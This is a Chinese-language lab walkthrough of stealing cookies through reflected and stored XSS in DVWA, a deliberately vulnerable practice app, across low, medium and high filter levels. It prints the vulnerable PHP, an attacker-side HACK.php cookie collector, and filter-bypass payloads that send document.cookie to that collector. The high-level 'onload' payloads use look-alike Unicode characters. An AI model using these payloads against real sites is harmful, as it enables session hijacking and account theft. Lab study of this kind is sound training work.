DVWA XSS擷取cookie
反射型
一、LOW
1.被害者已經登入http://127.0.0.1/DVWA/vulnerabilities/xss_r/ 網站,該網站存在xss漏洞。
網站源代碼如下:未進行任何過濾
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Feedback for end user
echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}
?>
2.攻擊者建立網站http://127.0.0.1/xss/,并在該網站下寫入HACK.php,代碼如下。
<?php
$cookie = $_GET['x'];
file_put_contents('cookie.txt', $cookie);
?>
3.引導受害者通路位址,必要時對<script>document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie;</script>進行編碼。
http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=
<script>document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie;</script>
4.擷取到受害者在http://127.0.0.1/DVWA/vulnerabilities/xss_r/網站的cookie資訊。
二、MEDIUM
網站源代碼:
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = str_replace( '<script>', '', $_GET[ 'name' ] );
// Feedback for end user
echo "<pre>Hello ${name}</pre>";
}
?>
過濾了
<script>,采用大小寫混合方式繞過:
http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=
<Script>document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie;</scRipt>
三、HIGH
源代碼:
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
// Feedback for end user
echo "<pre>Hello ${name}</pre>";
}
?>
過濾了<Script>标簽所有可能的形式。使用類似<iframe οnlοad=alert(‘haha’)>的标簽:
http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=
<iframe οnlοad=(document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie)>
成功擷取cookie。
存儲型
1.LOW
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitize name input
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
trim()函數,用于去除字元串左右兩側的空格
stripslashes()函數,用于去除字元串中的反斜杠
mysqli_real_escape_string()對sql語句中的特殊字元進行轉義。
從源碼上看,此處,隻是對輸入的name,message做了防止sql注入的過濾,并沒有對輸入的字元串進行安全性過濾和處理。
當字元串寫入資料庫的時候,如果存在特殊字元,也會被轉義,但是在當我們從資料庫中調出的時候,并不影響特殊字元的功能。
name輸入框中輸入:
<script>document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie;</script>
今後每次通路該界面都傳回cookie。
再次實驗時删除MySQL資料庫中資料即可。
2.MEDIUM
Stored XSS Source
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = str_replace( '<script>', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
-
strip_tags()函數去除html标簽
htmlspecialchars()函數,将預定義字元轉換成html實體
str_replace()函數,轉義函數,将指定的字元或字元串轉換成别的字元,這裡是将<script>轉為空。缺點轉義的時候區分大小寫。
通過源碼可以看出,對message的值進行了标簽的過濾以及預定義符的轉義。對name的值進行了轉義。對name進行xss攻擊。
在name輸入框中輸入:
<Script>document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie;</Script>
今後每次通路該界面都傳回cookie。
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
- 這個源碼比中級别的多了一個過濾函數來過濾name的值,preg_replace()函數,進行正規表達式比對防止大小寫,多重輸入字元繞過過濾函數。
- 這個函數雖然不錯,但是我們不用與低中級相似的payload,不就可以成功繞過這個函數了嘛!我們構造payload:
<iframe οnlοad=(document.location='http://127.0.0.1/xss/HACK.php?x='+document.cookie)>
今後每次通路該界面都傳回cookie。